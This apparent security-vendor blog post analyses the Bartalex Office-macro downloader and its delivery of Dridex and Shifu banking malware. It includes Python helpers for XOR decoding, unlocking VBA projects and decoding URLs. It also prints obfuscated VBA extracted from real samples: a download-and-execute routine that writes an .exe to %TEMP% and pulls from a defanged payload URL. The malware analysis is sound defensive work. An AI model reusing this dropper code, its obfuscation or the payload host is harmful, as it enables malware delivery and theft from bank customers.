King Salemno, Security Threat Analyst
Greg Leah, Malware Researcher
Bartalex is a name that continues to appear in a cyberthief’s arsenal as one of the most popular mechanisms for distributing banking Trojans, ransomware, RATs, and other malware. The SANS ISC recently published a very interesting technical analysis of Bartalex. With this post, we hope to add a little more color and supplement what you already know about this prolific malware distributor.
Victims of Bartalex (and the later-stage malware Bartalex installs) are infected via Office documents embedded with macros that, when executed, install Bartalex. In older versions of Office, the infection occurs when the document is opened due to a special VBA function called Auto_Open. Newer versions of Office have security settings in place to prevent the auto-execution of such code. Thus, an attacker usually relies on social engineering tricks to make sure the macros still trigger.
The message contained in the body of the document is attempting to social engineer the user into enabling the malicious macros.
Two Styles of Bartalex
Bartalex has two main mechanisms used to deploy the second-stage payload onto the victim’s machine. Let’s look at both:
→ Downloader / Loader
These samples will issue an HTTP GET request for a remote object: the secondary payload, which is usually hosted on a compromised system. The second stage will either be served as-is (a native Win32 executable) or encoded in some way. Dridex campaigns routinely use the loader method and will download the second stage in its native form. CryptoWall (ransomware) campaigns will also use the loader technique, however, with a little twist. The second-stage payload in a CryptoWall campaign is usually obfuscated via an XOR cipher (most recently with the key: nkiOaWsg). After receiving the payload, some extra functionality included in Bartalex decodes the payload before execution. This is usually done to thwart anti-virus engines.
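To make the loader-with-a-twist case concrete, here is an added example (ours, not code from the post or from Bartalex) that decodes a fetched CryptoWall-style second stage and checks that the result is actually a Windows executable before anything else is done with it. The key nkiOaWsg is the one reported above; treating it as a repeating (cyclic) XOR key is this example's assumption, as are all function names, and the payload bytes are a constructed stand-in for a PE file.

```python
from itertools import cycle

XOR_KEY = b"nkiOaWsg"   # key reported for recent CryptoWall second stages


def xor_repeating(data: bytes, key: bytes = XOR_KEY) -> bytes:
    """XOR data with a repeating key (assumed cipher form). XOR is its own
    inverse, so the same call both encodes and decodes."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def looks_like_pe(data: bytes) -> bool:
    """Cheap PE sanity check: MZ stub, then follow e_lfanew (offset 0x3c)
    to the PE\\0\\0 signature. Enough to tell a decoded binary from noise."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def decode_if_obfuscated(blob: bytes):
    """Return (payload, was_encoded).

    Loader samples serve the second stage either as-is or XOR-obfuscated,
    so try the plain form first and the XOR-decoded form second. Returns
    (None, False) when neither looks like a PE, so the caller never treats
    random bytes as a program.
    """
    if looks_like_pe(blob):
        return blob, False
    decoded = xor_repeating(blob)
    if looks_like_pe(decoded):
        return decoded, True
    return None, False


# Constructed stand-in for a PE file: DOS header, e_lfanew = 0x40, PE signature,
# then filler. Not a real executable, just enough structure for the check above.
SAMPLE_PE = (
    b"MZ" + b"\x00" * 58
    + (0x40).to_bytes(4, "little")
    + b"PE\x00\x00"
    + b"\x90" * 32
)

if __name__ == "__main__":
    # Simulate what the loader receives from the compromised host.
    wire_blob = xor_repeating(SAMPLE_PE)
    payload, was_encoded = decode_if_obfuscated(wire_blob)
    print("encoded on the wire:", was_encoded, "| decoded is PE:", looks_like_pe(payload))
```

The PE check is deliberately shallow; it is a triage filter, not a parser. When the key changes between campaigns, the same structure applies: decode, then validate the result before doing anything else with it.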
Some samples will use a more evasive technique such as embedding the payload in the Office document directly. This payload is then “dropped” or extracted onto the victim’s machine. This is usually less apparent with Excel documents, but the size of such files is a rather large indicator. Microsoft Word documents will contain what appears to be several blank pages. However, the pages themselves are not exactly blank but contain the data comprising the payload in question.
Time Complexity Issue
Malware authors (including the creators of Bartalex) exploit the time complexity problem by obfuscating the code found in the document. You will see a series of random characters which appear to be gibberish, with the sole purpose of infecting the victim’s machine. This obfuscation is an attempt to make it difficult for an analyst to determine the specific nature and behavior of the code. The longer the analysis time, the longer the campaign runs. The longer the campaign runs, the more the victim tally rises. Even more recently, we have noticed malware authors password-protecting the macros, thus preventing a review of the malicious code in question. This greatly increases the time needed for analysis.
In the next section, we will show you a trick to break this time complexity problem into a much more manageable piece.
Breaking Office protected macros
WARNING – The following steps will execute the code and should only be attempted in a safe, isolated analysis environment.
Malware that abuses Office Macros, like Bartalex, will often password-protect macros to prevent analysis by security researchers. In fact, novice analysts will often attempt to brute force the password used for the macro. This is by far one of the most insanely inefficient ways of getting to the source code in question. You are essentially falling prey to the time complexity issue put forth by the attacker. There exists a much easier workaround to immediately break the protection mechanism and save yourself time.
This document contains a password-protected macro.
Open the document in question with a Hex Editor and search for the string “DPB.” Using a live sample, you will see something that appears like the following:
We are merely changing one byte to get this trick to work. Simply change the B in DPB to an X. You should have the following:
At this point, you want to save your changes and exit. You will no longer be needing the hex editor.
Reopen the document in Office. When prompted, click “Yes” and continue loading the project in question. After loading continues, you may receive an error, which you should just click “OK.”
Now inside the Developer tab, choose “Visual Basic.” It will appear as the left-most icon on the toolbar as shown above.
You will receive an unexpected error. Click “OK” to continue.
Right-click the Project found in the Document and choose “Project Properties.”
Here you just want to uncheck the option “Lock project for viewing” and save the document. Now just go back and attempt to edit the macros and voilà! Jackpot!
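The one-byte edit above is easy to script when you have a batch of samples to look at. The following is an added example of ours (not part of the post) that applies the same DPB-to-DPX rename: legacy binary documents (.doc/.xls) are OLE containers and get patched in place, exactly like the hex-editor step, while OOXML files (.docm/.xlsm) are ZIP archives whose vbaProject.bin member is patched and re-zipped. The key names DPB= and DPX= come from the steps above; the file names, function names and the sample PROJECT stream text are this example's own constructions.

```python
import io
import sys
import zipfile
from typing import Tuple

DPB_KEY = b"DPB="      # line in the VBA PROJECT stream that carries the lock settings
PATCHED_KEY = b"DPX="  # the post's edit: B becomes X, so the VBE ignores the key


def patch_project_stream(data: bytes) -> Tuple[bytes, int]:
    """Rename every DPB= key to DPX= in a raw OLE/VBA byte blob.

    Returns the patched bytes and how many keys were renamed (0 means no
    protection line was found contiguously, or this is not a VBA project).
    """
    count = data.count(DPB_KEY)
    return data.replace(DPB_KEY, PATCHED_KEY), count


def patch_document(data: bytes) -> Tuple[bytes, int]:
    """Apply the patch to a whole file.

    Anything that is not a ZIP is treated as a legacy OLE document and
    patched directly. For OOXML, every member carrying a DPB= key (normally
    word/vbaProject.bin or xl/vbaProject.bin) is patched and the archive is
    rebuilt with the remaining members copied unchanged.
    """
    if not data.startswith(b"PK\x03\x04"):
        return patch_project_stream(data)

    total = 0
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(data)) as zin, zipfile.ZipFile(out, "w") as zout:
        for info in zin.infolist():
            member = zin.read(info)
            if DPB_KEY in member:
                member, n = patch_project_stream(member)
                total += n
            new_info = zipfile.ZipInfo(info.filename, date_time=info.date_time)
            new_info.compress_type = info.compress_type
            zout.writestr(new_info, member)
    return out.getvalue(), total


# --- constructed sample data so the script can be exercised offline ----------
# Minimal stand-in for a PROJECT stream; only the DPB= line matters here.
SAMPLE_PROJECT_STREAM = (
    b'ID="{00000000-0000-0000-0000-000000000000}"\r\n'
    b'Document=ThisDocument/&H00000000\r\n'
    b'Name="Project"\r\n'
    b'CMG="0000"\r\n'
    b'DPB="0000"\r\n'
    b'GC="0000"\r\n'
)


def build_sample_docm(project_stream: bytes) -> bytes:
    """Build an in-memory ZIP shaped like a macro-enabled Word file (constructed)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", b"<Types/>")
        z.writestr("word/vbaProject.bin", project_stream)
    return buf.getvalue()


def read_vba_member(docm: bytes, name: str = "word/vbaProject.bin") -> bytes:
    """Read one member back out of an in-memory OOXML file."""
    with zipfile.ZipFile(io.BytesIO(docm)) as z:
        return z.read(name)


if __name__ == "__main__":
    # usage: python unlock_vba.py <input document> <output document>
    src, dst = sys.argv[1], sys.argv[2]
    with open(src, "rb") as f:
        patched, renamed = patch_document(f.read())
    with open(dst, "wb") as f:
        f.write(patched)
    print(f"{renamed} DPB key(s) renamed; wrote {dst}")
```

A count of zero on a legacy .doc/.xls deserves a manual look: the PROJECT stream is stored in OLE sectors, and if the four bytes happen to straddle a sector boundary a plain byte search (in this script or in a hex editor) will not see them together. The patch only removes the “Lock project for viewing” flag; the steps above for opening the result in Office, in an isolated environment, are unchanged.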
Dridex Distribution via Bartalex
Dridex has been well documented as one of the most prolific crimeware families in operation today. It is an evolution of the Cridex / Bugat / Feodo / Geodo family with several technical updates. The current evolution of the Dridex family appeared in July 2014 and it is still actively developed and distributed on a daily basis.
A recent arrest of the suspected operator (http://www.justice.gov/opa/pr/bugat-botnet-administrator-arrested-and-malware-disabled) resulted in a cessation of the botnet operations for an extended period of time. Since then, the botnet is back in action doing almost daily campaigns. In the past week it appears the Dridex gang has stepped up operations, with some organizations estimating a 1000-1500 percent increase in distribution.
There are currently two main sub-botnets in use, 120 and 220. They differ in the targeted organization list and distribution. Other botnet identifiers have also been identified including 121 and as recently as November 3rd, 2015, botnet 301.
On November 13, 2015, PhishLabs researchers observed the reemergence of botnet 122, pushing a config targeting a number of U.S. companies, whereas 120 and 220 have been primarily targeting UK banks.
Dridex is generally distributed by Bartalex as described above: spam emails with a portable document attachment. The attached document contains macros to download the second stage of the malware. This usually requires user interaction to enable macros in the infected document.
[example email with Bartalex infected attachment]
[example Bartalex documents]
When the victim opens the file and enables macros, code similar to the following is executed to download the second stage of the malware.
```vba
' Extract of the Bartalex macro. The ProgIDs are assembled from computed
' characters so that strings such as "Microsoft.XMLHTTP" never appear in the source.
slash_ro = "\"
dot_ro = Asc(slash_ro) - 46        ' Asc("\") = 92; 92 - 46 = 46 = "."
e_ro = dot_ro + 55                 ' 46 + 55 = 101 = "e"
Set pid_kan = CreateObject("Microsoft" + Chr(dot_ro) + "XMLHTTP")                   ' Microsoft.XMLHTTP
Set pid_mad = CreateObject("Adodb" + Chr(dot_ro) + "Str" + Chr(e_ro) + "am")        ' Adodb.Stream
Set mid_con = CreateObject("WScript" + Chr(dot_ro) + "Sh" + Chr(e_ro) + "ll").Environment("Proc" + Chr(e_ro) + "ss")   ' WScript.Shell, Environment("Process")
Set pid_did = CreateObject("Sh" + Chr(e_ro) + "ll" + Chr(dot_ro) + "Application")   ' Shell.Application
pid_tro = mid_con("T" + UCase(Chr(e_ro)) + "M" + "P")                               ' value of %TEMP%
pid_tot = pid_tro + slash_ro + "ribasll" + Chr(dot_ro) + "" + Chr(e_ro) + "x" + Chr(e_ro)   ' %TEMP%\ribasll.exe
Dim solob() As Variant
' Obfuscated payload URL, one integer per character (see Redistribute below)
solob = Array(3433, 3445, 3445, 3441, 3387, 3376, 3376, 3448, 3448, 3448, 3375, 3428, 3426, 3444, 3445, 3430, 3435, 3440, 3439, 3429, 3430, 3447, 3426, 3437, 3429, 3430, 3435, 3426, 3444, 3426, 3375, 3430, 3444, 3376, 3385, 3384, 3450, 3445, 3430, 3382, 3382, 3376, 3383, 3445, 3381, 3382, 3430, 3450, 3447, 3375, 3430, 3449, 3430)
' Displays the decoded URL; the HTTP GET that uses it is commented out below
MsgBox (Redistribute(solob, 52))
'pid_kan.Open "G" + "" + UCase(Chr(e_ro)) + "" + "T", Redistribute(solob, 52), pLiveTrades
' Statements from the Adodb.Stream With-block that saves the response to pid_tot
' (the surrounding With ... End With and the write of the response body are not in this extract)
.Type = 1
.savetofile pid_tot, 2

' Decoder: each array element minus (13 * oldLen + 2653) is one character code
Function Redistribute(Z() As Variant, oldLen As Integer) As String
    Dim n As Integer
    For n = LBound(Z) To UBound(Z)
        Redistribute = Redistribute & Chr(Z(n) - 13 * oldLen - 2653)
    Next n
End Function
```
The above is a sample of macro code extracted from a recent Dridex campaign (2015.11.10). The code was isolated from around 800 lines of seemingly benign VBA code. The technique of hiding malicious code in between lines of benign code is a classic technique used by malware authors. We have extracted a subset of the malicious code to illustrate the download-and-execute routine.
The extracted code essentially does the following, which is typical for Bartalex:
* Create a Microsoft.XMLHTTP object
* Create an Adodb.Stream object
* Create a WScript.Shell.Environment( "Process" ) object
* Create a Shell.Application object
* Allocate an array with the obfuscated payload URL
* Define a deobfuscation function
* Download and execute the second-stage payload using the above objects
The payload URL is encoded in the solob() array in the above code. When decoded, the Dridex payload is revealed to be located at the following web address: hXXp://www.castejondevaldejasa[.]es/87yte55/6t45eyv.exe. This payload was the loader for a Dridex botnet 220 sample.
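You do not need to let the document run to get that URL. The following is an added example of ours (not from the post) that ports the macro's Redistribute() decoder to Python and runs it over the solob array shown above. The constants 13 and 2653 and the oldLen argument of 52 are the macro's own; the Python function names, the prefix-based shift recovery and the defang helper are this example's additions. The recovery step goes a little beyond the post: when a sample uses the same constant-shift scheme with different constants, it recovers the shift from the fact that the plaintext must start with "http". It does not apply to the Shifu snippet later in the post, whose GetStringFromArray() body is not shown.

```python
from typing import List, Optional

# The solob array from the Dridex macro extract above (53 values, one per character).
SOLOB: List[int] = [
    3433, 3445, 3445, 3441, 3387, 3376, 3376, 3448, 3448, 3448, 3375, 3428,
    3426, 3444, 3445, 3430, 3435, 3440, 3439, 3429, 3430, 3447, 3426, 3437,
    3429, 3430, 3435, 3426, 3444, 3426, 3375, 3430, 3444, 3376, 3385, 3384,
    3450, 3445, 3430, 3382, 3382, 3376, 3383, 3445, 3381, 3382, 3430, 3450,
    3447, 3375, 3430, 3449, 3430,
]


def redistribute(values: List[int], old_len: int, mult: int = 13, const: int = 2653) -> str:
    """Port of the macro's Redistribute(): Chr(Z(n) - 13 * oldLen - 2653).
    The whole array is shifted by one constant, so this is a Caesar-style
    offset over character codes rather than real encryption."""
    shift = mult * old_len + const
    return "".join(chr(v - shift) for v in values)


def recover_shift(values: List[int], known_prefix: str = "http") -> Optional[int]:
    """Recover the constant shift without knowing oldLen or the constants,
    assuming the plaintext starts with known_prefix. Returns None when no
    single shift maps the leading values onto the prefix (i.e. the sample
    uses some other scheme)."""
    if len(values) < len(known_prefix):
        return None
    shift = values[0] - ord(known_prefix[0])
    if all(v - shift == ord(c) for v, c in zip(values, known_prefix)):
        return shift
    return None


def auto_decode(values: List[int], known_prefix: str = "http") -> Optional[str]:
    """Decode an array of this form when the macro's constants are not at hand."""
    shift = recover_shift(values, known_prefix)
    if shift is None:
        return None
    return "".join(chr(v - shift) for v in values)


def defang(url: str) -> str:
    """Render a URL so it cannot be clicked or auto-linked in a report."""
    scheme, _, rest = url.partition("://")
    host, sep, path = rest.partition("/")
    return scheme.replace("http", "hXXp") + "://" + host.replace(".", "[.]") + sep + path


if __name__ == "__main__":
    url = redistribute(SOLOB, 52)
    print("shift used by the macro:", 13 * 52 + 2653)
    print("shift recovered from prefix:", recover_shift(SOLOB))
    print("decoded payload URL:", defang(url))
```

Because the scheme is a single constant offset, a wrong oldLen produces visible garbage rather than plausible text, which is why checking the first few characters against "http" is enough to recover it.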
Shiz/Shifu Observed Being Pushed by Bartalex
Shifu malware has also been observed using the same distribution techniques. Shifu, which was first discovered in January of this year, targets mainly Japanese and UK banks. Shifu is characterized as utilizing many anti-analysis and anti-VM techniques to thwart automated analysis by researchers. Shifu uses a domain generation algorithm (DGA) to programmatically determine the current list of C&C addresses to connect to.
On October 20, a campaign was observed distributing Shifu using the same booby-trapped macro documents seen in recent Dridex campaigns. For comparison, here is a snippet of code from one of the Excel documents:
Email lure with Shifu Attachment
```vba
' Snippet from the Shifu Excel document: same pattern as the Dridex macro,
' an integer array holding the URL plus a decoder routine (GetStringFromArray,
' not shown in this snippet) called with a second numeric argument.
Dim computer() As Variant
computer = Array(149, 159, 157, 151, 95, 82, 80, 143, 126, 139, 136, 140, 136, 120, 124, 61, 120, 129, 106, 115, 110, 119, 111, 100, 43, 94, 115, 38, 43, 40, 39, 35, 35, 32, 24, 75, 26, 25, 24, 23, 69, 20, 7, 60, 77, 56)
On Error Resume Next
' httpRequest is the XMLHTTP object created elsewhere in the document
httpRequest.Open "GE" + "T", GetStringFromArray(computer, 45), False
```
This code is very similar to the code distributing the older Dridex malware family.
Variants and Future Expectations
Bartalex has seen a couple of variants in the recent past, for example loaders downloading a text file containing a single URL which points to the actual payload (which we have aptly named the 'payload pointer' file). Although these are old tricks, malware authors are simply using tried and trusted techniques that still work. As malware analysts and anti-virus companies play cat and mouse in an effort to level the playing field, we will continue to see various alterations to dear old Bartalex until it presents a stalemate which makes such a distribution instrument no longer feasible. PhishLabs has monitored the evolution of Bartalex, its payloads as well as the intended targets for some time. Is Microsoft Office important in your organization? Please remember that a daily operational tool such as a word processor can still be the malicious vector that can gravely impact your business.
If you are still concerned about the likes of Bartalex or other malware authors, our team is always here to tell you how we can help mitigate as well as prevent future infections to your company.